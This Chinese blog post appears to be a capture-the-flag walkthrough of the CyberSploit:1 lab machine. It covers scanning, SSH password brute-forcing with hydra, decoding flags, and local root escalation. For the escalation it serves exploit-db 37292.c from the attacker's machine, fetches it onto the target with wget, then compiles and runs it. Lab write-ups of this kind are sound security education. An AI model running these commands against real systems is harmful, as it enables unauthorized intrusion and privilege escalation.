CyberSploit渗透测试

最新推荐文章于 2024-05-20 17:15:16 发布
最新推荐文章于 2024-05-20 17:15:16 发布
阅读量265 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: linux 服务器 ssh 网络安全 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZK_1874/article/details/129751945
版权

2.2.1 确定IP

使用工具扫描主机的 IP 以及开放的端口

命令:netdiscover -i eth0 -r 192.168.150.0/24 或者 arp-scan -l

发现目标机IP

2.2.2 信息收集

获取IP后,获取端口:nmap -sS -p--A -Pn 192.168.150.149

发现开放了22和80端口

使用工具扫描网站目录:dirb http://192.168.150.149

访问http://192.168.150.149/cgi-bin

访问http://192.168.150.149/hacker

一个动态页面,没有什么有价值的信息。

访问http://192.168.150.149/robots.txt

发现一串数据:

R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9

应该是base64编码,对其进行解码:

得到Flag1:cybersploit{youtube.com/c/cybersploit}

2.2.3 漏洞扫描

对网站进行漏洞扫描

命令:nikto -host 192.168.150.149

没有发现漏洞。

对于22端口,使用searchsploit搜索OpenSSH

OpenSSH 5.9 没有发现漏洞

对于80端口,访问网站: http://192.168.150.149:80

发现一个动态页面,点击选项没有反应,页面没有太多信息,查看其源码试试

发现一个username: itsskv,可能是登录账户。

使用hydra破解ssh:hydra -L itsskv-P top1000.txt ssh://192.168.150.149

破解失败。

使用cewl生成网站字典:cewl http://192.168.150.149 > user222.txt

再使用hydra破解ssh:hydra -Luser222.txt -P user222.txt ssh://192.168.150.149

还是没有成功。刚才得到flag1,尝试是否是密码

使用开放的ssh服务进行连接:ssh itsskv@192.168.150.149

密码使用Flag1:cybersploit{youtube.com/c/cybersploit}

登录成功。

然后查看文件,看是否有关键信息

发现flag2.txt文件

0110011101101111 01101111 01100100 00100000 01110111 01101111 01110010 0110101100100000 00100001 00001010 01100110 01101100 01100001 01100111 0011001000111010 00100000 01100011 01111001 01100010 01100101 01110010 0111001101110000 01101100 01101111 01101001 01110100 01111011 01101000 0111010001110100 01110000 01110011 00111010 01110100 00101110 01101101 0110010100101111 01100011 01111001 01100010 01100101 01110010 01110011 0111000001101100 01101111 01101001 01110100 00110001 01111101

查看之后发现是二进制文件,使用在线解码工具: https://gchq.github.io/CyberChef

得到flag2:cybersploit{https:t.me/cybersploit1}

2.2.4 漏洞利用

没有其他漏洞。

2.2.5 提权

查看用户组和sudo权限:

没有sudo权限。

利用SUID进行提权:find / -user root -perm -4000 -print2>/dev/null

没有发现可以利用的点(常见可利用程序:nmap,vim,find,bash,more,less,nano,cp)

利用漏洞工具查询提权

使用linuxprivchecker查询本地漏洞,下载linuxprivchecker.py权限检查程序:

wget http://www.securitysift.com/download/linuxprivchecker.py

运行程序 python linuxprivchecker.py,得到的最后结果,没有提示具体漏洞

下载 Linux Exploit Suggester 到 kali: git clone https://github.com/PenturaLabs/Linux_Exploit_Suggester.git

然后开启 Python 服务器:

cd Linux_Exploit_Suggester

python3 -m http.server 80

在服务器上下载:wget http://192.168.150.137:80/Linux_Exploit_Suggester.pl

下载之后修改权限并运行脚本: chmod 777Linux_Exploit_Suggester.pl

./Linux_Exploit_Suggester.pl uname –r

发现一个漏洞:https://www.exploit-db.com/exploits/31346,尝试利用,没成功。

利用漏洞本地提权

查看内核版本和系统版本:uname -a lsb_release -a

内核:3.13.0 ,系统版本是:Ubuntu 12.04.5,

kali搜索是否存在该版本的漏洞利用文件:searchsploitlinux 3.13.0

发现存在该版本漏洞利用文件。

拷贝文件到本机目录,输入:cp/usr/share/exploitdb/exploits/linux/local/37292.c .

使用python搭建服务器:python3 -m http.server 80

下载文件到靶机:wget http://192.168.150.137/37292.c

查看命令:more 37292.c

编译命令:gcc 37292.c -o ofs

执行 ./ofs

提权成功,切换到root目录,查看文件

找到finalflag.txt,获得flag3:cybersploit{Z3X21CW42C4 many many congratulations !}

3.总结

1、用到的工具:netdiscover,nmap,dirb,nitko,python,hydra,cewl

2、解密时,用到了base64解密、二进制转字符串

3、提权时,用到了本地提权漏洞。

K_BLACKHOLE
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机-CyberSploit:1渗透笔记
liver100day的博客
07-30 597
文章目录1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)2.4 爆破目录3.漏洞利用3.1 ssh登录4.提权1.在kali里面搜索有无该版本的漏洞利用文件2.将文件保存到本地(若不指定文件保存目录的话,文件保存的位置为你当前路径)3.使用python搭建一个简易的服务器4.控制ssh下载漏洞利用文件5.编译漏洞利用文件并执行提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:CyberSploit:1
CyberSploit2-writeup
Lee
08-18 244
CyberSploit2-writeup 0x00 发现目标 导入CyberSploit2.ova文件,配置好网络模式为桥接模式 nmap扫描局域网nmap -sn 16.16.16.0/24发现目标IP是16.16.16.171 使用nmap扫描下端口nmap -sV 16.16.16.171 root@kali:~# nmap -sV 16.16.16.171 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 11:48 CST Nmap sca
CyberSploit:1
小小猪的博客
10-28 1560
上传linpeas.sh进行漏洞发现,linpeas.sh自行在github上面下载。登录ssh,密码是flag1,查看到flag2。nmap扫描服务以及端口,发现80和22。扫描目录,发现robots.txt文件。进行解密,得到flag2。进行base64解密。得到第三个flag3。
靶机渗透测试CyberSploit: 2)
@小张小张的博客
10-19 989
靶机渗透测试(): ***Vulnhub靶机 *** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Easy–Intermediate) 目标:拿下三个flag.txt 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192.168.10.0 嗅探出靶机ip为 192.168.10.79 2. nmap进行靶机端口服务扫描 命令: n
vulnhub靶机-CyberSploit: 2
臭nana的博客
07-20 773
1、找到靶机ip:192.168.0.131 nmap -sn 192.168.0.0/24 2、扫描靶机端口 root@kali:~# nmap -p- -A 192.168.0.130 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.130 Host is up (0.00070s latency). Not shown: 65533 closed ports PORT STATE SERV
CyberSploit2渗透测试
ZK_1874的博客
03-24 300
CyberSploit2渗透测试
vulnhub靶机-CyberSploit: 1
臭nana的博客
07-20 1363
这个系列的靶机解密部分有点像ctf的杂项,两个靶机都比较简单 1、找到靶机ip:192.168.0.130 nmap -sn 192.168.0.0/24 2、扫描靶机端口 3、访问80端口,动图还不错,F12查看源码发现一个用户名itsskv 4、手动尝试一下robots.txt文件,发现一串密文,base64解密得到flag1 root@kali:~# echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1..
靶机渗透测试CyberSploit: 1)
@小张小张的博客
10-12 2267
靶机渗透测试CyberSploit: 1): Vulnhub靶机 CyberSploit: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Easy–Intermediate) 目标:拿下三个flag.txt 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 终端命令: netdiscover -i eth0 -r 192.168.10.0(网关) 得到靶机ip:192.168.10.7
Linux知识点笔记
exercise_smile的博客
05-16 874
Linux 主要的发行版(release):Ubuntu(乌班图)、 RedHat(红帽)、 CentOS、 Debain[蝶变]、 Fedora、 SuSE、 OpenSUSE [示意图]在 linux 中的每个用户必须属于一个组, 不能独立于组外。在 linux 中每个文件 有所有者、 所在组、 其它组的概念。ls -l 中显示的内容如下:0-9 位说明:第 0 位确定文件类型(d, - , l , c , b)l 是链接, 相当于 windows 的快捷方式。
Linux 三十六章
一怀明月的博客
05-17 982
信号量 sem_init sem_destroy sem_wait sem_post 基于环形队列的CP问题 环形队列的生产者消费者模型 线程池 localtime时间戳转化 mkdir系统调用 bind绑定成员函数 懒汉饿汉单例模式 懒汉模式: 饿汉模式: 懒汉和饿汉相同点: 线程池源码实现
Linux “如何添加用户/组和修改用户/组”
y2162484776的博客
05-20 367
我们首先要知道Linux中用户时必须的吗!???用户是标识计算机的资源归属的。
操作系统 实验13 批处理操作接口3:引用与命令替换
m0_63093530的博客
05-14 152
结果:第一个和第三个命令是错的,第二个和第四个命令是对的。echo "这是命令替换形式1...$date1"echo "$sv ++++加上另一些字符!2、输出字符串“China's panda”命令:echo China\'s panda。6、将命令date执行结果赋予变量date1。7、将命令date执行结果赋予变量date2。1、输出字符串“$Dollar”命令:echo \$Dollar。命令:date2=$(date)命令:date1=`date`
Windows、Linux添加路由
刘某的博客
05-20 182
路由添加、修改、删除的基本命令
Linux的基础指令
asdssadddd的博客
05-14 945
常用选项:-f 或 --force 强行复制文件或目录, 不论目的文件或目录是否已经存在.-i 或 --interactive覆盖文件之前先询问用户.-r递归处理, 将指定目录下的文件与子目录一并处理. 若源文件或目录的形态, 不属于目录或符号链接, 则一律视为普通文件处理.-R 递归处理, 将指定目录下的文件及子目录一并处理.
Linux - 整理工作中常用的 Linux 命令(目录、文件、系统、进程、网络)持续更新~
CYK_byte的博客
05-16 941
整理了一下工作中常用的 Linux 命令(目录、文件、系统、进程、网络)
Linux】-Zookeeper安装部署[17]
weixin_63106307的博客
05-20 280
除了为Hadoop和Hbase提供协调服务外,ZooKeeper也被其他软件采用作为其分布式状态一致性的依赖,比如Kafka,又或者一些软件项目中,也经常能见到ZooKeeper作为一致性协调服务存在。10、【在node1、node2、node3上分别执行】启动zookeeper。11、【在node1、node2、node3上分别执行】检查zookeeper。7、【node1上操作】 将zookeeper 复制到node2和node3。2、【node1上操作】下载ZooKeeper安装包,并解压。
linux】详解vim编辑器
最新发布
2301_79796701的博客
05-20 444
通用的配置再插入模式下就像一个记事本一样,如果要写代码,写文本会很不舒服,而用户可以额外的为vim添加其他配置。在目录 /etc/ 下面,有个名为vimrc的文件,这是系统中公共的vim配置文件,对所有用户都有效。文件保存或退出,也可以进行文件替换,找字符串,列出行号等操作。」号表示一个数字,在冒号后输入一个数字,再按回车键就会跳到该行了,如输入数字。」键,再输入您想寻找的字符,如果第一次找的关键字不是您想要的,可以一直按「n。」键,再输入您想寻找的字符,如果第一次找的关键字不是想要的,可以一直按。
Linux中的文本编辑器Vim
2301_76197086的博客
05-20 368
详解Linux中的文本编辑器Vim(基本概念、基本操作、文件配置)
Linux第四节--常见的指令介绍集合(持续更新中)
touchinaiyou的博客
05-14 433
linux常见的几条指令

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值